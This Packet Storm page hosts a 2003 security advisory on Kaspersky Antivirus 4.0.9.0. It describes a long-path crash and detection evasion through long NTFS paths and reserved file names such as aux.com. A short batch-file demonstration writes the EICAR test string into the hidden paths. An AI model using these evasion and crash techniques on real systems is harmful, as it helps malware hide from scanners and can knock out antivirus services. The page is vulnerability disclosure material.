exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

security-nnov.kav.txt

security-nnov.kav.txt
Posted Feb 12, 2003
Authored by 3APA3A | Site security.nnov.ru

Kaspersky Antivirus (KAV) crashes when it tries access a path that has more the 256 characters. In addition to this vulnerability, a long path can be used to hide malware. Also, malware with specially crafted names are not detected by this anti-virus product. Tested on Kaspersky Antivirus 4.0.9.0.

tags | advisory, virus
SHA-256 | 6949810c13d2cba2796d0abbbae6962016128aba3acc695195bdaa032d0e85b3

security-nnov.kav.txt

Change Mirror Download
Title: Kaspersky Antivirus DoS
Affected: Kaspersky Antivirus 4.0.9.0
(Server and Workstation version on
Windows NT 4.0 and Windows 2000).
Author: ZARAZA <3APA3A@SECURITY.NNOV.RU>
Vendor: Kaspersky Lab
Date: January, 30 2003
Risk: Average
Exploitable: Yes
Remote: Yes (for server versions)
Vendor Notified: January, 30 2003

I. Introduction:

Kaspersky Antivirus (KAV) is a family of antiviral products.

II. Vulnerability:

Few vulnerabilities were identified. Most serious allows user to crash
antiviral server remotely (write access to any directory on remote
server is required).

1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection

III. Details:

1. Long path crash

NTFS file system allows to create paths of almost unlimited length.
But
Windows API does not allow path longer than 256 bytes. To prevent
Windows API from checking requested path \\?\ prefix may be used to
filename. This is documented feature of Windows API. Paths longer than
256 characters will cause KAV monitor service to crash or hang with
100%
CPU usage. Possibility of code execution is not researched.

2. Long path prevents malware from detection

Long path will also prevent malware from detection by antiviral
scanner.

3. Special name prevents malware from detection

It's possible to create NTFS file with name like aux.vbs or aux.com.
Malware in this file will not be detected.

IV. Exploit:

This .bat file demonstrates vulnerability.

1,2 Long path crash & Long path prevents malware from detection

@echo off
SET
A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com

3. Special name prevents malware from detection

echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\aux.com

V. Vendor

No response from vendor.

--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    8 Files
  • 6
    Jul 6th
    8 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close